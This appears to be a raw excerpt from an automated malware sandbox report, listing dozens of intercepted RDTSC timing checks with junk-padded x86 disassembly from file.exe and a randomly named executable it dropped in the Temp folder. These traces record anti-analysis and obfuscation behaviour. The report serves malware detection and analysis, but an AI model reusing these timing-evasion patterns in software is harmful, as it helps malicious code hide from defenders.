Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07E6 second address: 50E087A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cl, 9Bh 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F856102FBF9h 0x00000019 and si, BF16h 0x0000001e jmp 00007F856102FBF1h 0x00000023 popfd 0x00000024 call 00007F856102FBF0h 0x00000029 mov ebx, eax 0x0000002b pop esi 0x0000002c popad 0x0000002d push esp 0x0000002e pushad 0x0000002f mov bx, si 0x00000032 call 00007F856102FBF4h 0x00000037 push esi 0x00000038 pop ebx 0x00000039 pop eax 0x0000003a popad 0x0000003b mov dword ptr [esp], esi 0x0000003e jmp 00007F856102FBEDh 0x00000043 mov esi, dword ptr [ebp+0Ch] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E087A second address: 50E0880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0880 second address: 50E0885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0885 second address: 50E08B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F856106A85Eh 0x0000000a and ax, 2728h 0x0000000f jmp 00007F856106A85Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E08B4 second address: 50E08B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E08B8 second address: 50E08BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E08BE second address: 50E094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 13h 0x00000005 pushfd 0x00000006 jmp 00007F856102FBF5h 0x0000000b sbb ch, FFFFFFF6h 0x0000000e jmp 00007F856102FBF1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F85D1B5D6ACh 0x0000001d jmp 00007F856102FBEEh 0x00000022 cmp dword ptr [75C7459Ch], 05h 0x00000029 jmp 00007F856102FBF0h 0x0000002e je 00007F85D1B75761h 0x00000034 pushad 0x00000035 pushad 0x00000036 call 00007F856102FBECh 0x0000003b pop eax 0x0000003c push ebx 0x0000003d pop ecx 0x0000003e popad 0x0000003f mov al, bl 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 mov cx, 70CBh 0x00000048 push eax 0x00000049 mov di, 67F2h 0x0000004d pop edi 0x0000004e popad 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 mov ebx, 6E6DF3D8h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E094D second address: 50E095B instructions: 0x00000000 rdtsc 0x00000002 mov edi, 3EBA7584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b movsx edi, si 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E09ED second address: 50E0A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 mov dl, ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F856102FBEBh 0x00000014 sub cl, FFFFFFCEh 0x00000017 jmp 00007F856102FBF9h 0x0000001c popfd 0x0000001d jmp 00007F856102FBF0h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0A6F second address: 50E0A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0A75 second address: 50E0AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F856102FBF7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0AA1 second address: 50E0AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0AA8 second address: 50E0AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F856102FBF3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0AC5 second address: 50E0ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0ACB second address: 50E0ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 19E4EB second address: 19E4F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 316149 second address: 31617D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F856102FBFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F856102FC08h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F856102FBEAh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 31617D second address: 316181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 316181 second address: 316185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 316185 second address: 31618B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3229B0 second address: 3229B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3229B9 second address: 3229C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 322C80 second address: 322C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBEFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 322C94 second address: 322C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 322C99 second address: 322CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F856102FBE6h 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F856102FBF9h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 322CC7 second address: 322CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 322F8F second address: 322F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 323136 second address: 323156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F856106A85Eh 0x0000000b pushad 0x0000000c ja 00007F856106A856h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3232D3 second address: 3232DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F856102FBE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3232DF second address: 3232F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F856106A856h 0x0000000c jmp 00007F856106A85Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3232F7 second address: 323319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F856102FBFAh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3263CF second address: 3263D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3263D8 second address: 3263DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3264CC second address: 32652E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D2441h], ebx 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2E70h] 0x00000019 call 00007F856106A859h 0x0000001e pushad 0x0000001f jmp 00007F856106A85Eh 0x00000024 jmp 00007F856106A85Eh 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F856106A865h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 push ecx 0x00000036 pushad 0x00000037 popad 0x00000038 pop ecx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 32652E second address: 326542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F856102FBE8h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326542 second address: 326566 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A863h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e jng 00007F856106A85Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326566 second address: 3265D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 mov ecx, dword ptr [ebp+122D2D40h] 0x0000000c mov esi, eax 0x0000000e push 00000003h 0x00000010 jmp 00007F856102FBF0h 0x00000015 push 00000000h 0x00000017 call 00007F856102FBF6h 0x0000001c sub ch, 00000002h 0x0000001f pop esi 0x00000020 push 00000003h 0x00000022 jnc 00007F856102FBECh 0x00000028 and esi, dword ptr [ebp+122D2EB8h] 0x0000002e call 00007F856102FBE9h 0x00000033 pushad 0x00000034 jmp 00007F856102FBF6h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3265D4 second address: 3265F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A860h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F856106A858h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3265F4 second address: 326623 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jno 00007F856102FBEEh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F856102FBEBh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326623 second address: 326661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F856106A869h 0x0000000b popad 0x0000000c pop eax 0x0000000d mov cx, 6D06h 0x00000011 lea ebx, dword ptr [ebp+1245C2E3h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F856106A861h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326661 second address: 326667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326667 second address: 32666B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3266CF second address: 3266F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F856102FBF3h 0x0000000f jl 00007F856102FBECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3266F4 second address: 326737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push edx 0x00000007 mov dword ptr [ebp+122D2568h], ecx 0x0000000d pop esi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F856106A858h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov si, A035h 0x0000002e push 6EEC4E5Ah 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3267F2 second address: 3267FC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F856102FBE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3267FC second address: 326816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F856106A865h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326816 second address: 326887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F856102FBF9h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F856102FBEBh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push ebx 0x0000001d push edx 0x0000001e pop edx 0x0000001f pop ebx 0x00000020 popad 0x00000021 pop eax 0x00000022 call 00007F856102FBEEh 0x00000027 or si, 339Eh 0x0000002c pop esi 0x0000002d mov edx, dword ptr [ebp+122D2E24h] 0x00000033 lea ebx, dword ptr [ebp+1245C2ECh] 0x00000039 mov dword ptr [ebp+122D1CF3h], edx 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push ecx 0x00000043 jmp 00007F856102FBEAh 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326887 second address: 32688D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 32694D second address: 326953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3453F9 second address: 3453FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3456F2 second address: 3456F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3456F6 second address: 345708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856106A85Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345B6A second address: 345B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345B6F second address: 345B87 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F856106A85Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345B87 second address: 345B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345CD1 second address: 345CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345CD5 second address: 345CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345CD9 second address: 345CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F856106A864h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345CF3 second address: 345D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345E97 second address: 345E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 317BB5 second address: 317BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 317BB9 second address: 317BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 346BEB second address: 346BF4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 346BF4 second address: 346BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 346D59 second address: 346D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 346D5D second address: 346D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3471D0 second address: 3471D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34E813 second address: 34E817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EDF5 second address: 34EE0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EE0E second address: 34EE14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EE14 second address: 34EE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EE18 second address: 34EE5F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jg 00007F856106A870h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F856106A864h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EE5F second address: 34EE8D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F856102FBE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jmp 00007F856102FBEEh 0x00000014 jg 00007F856102FBE8h 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EE8D second address: 34EE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
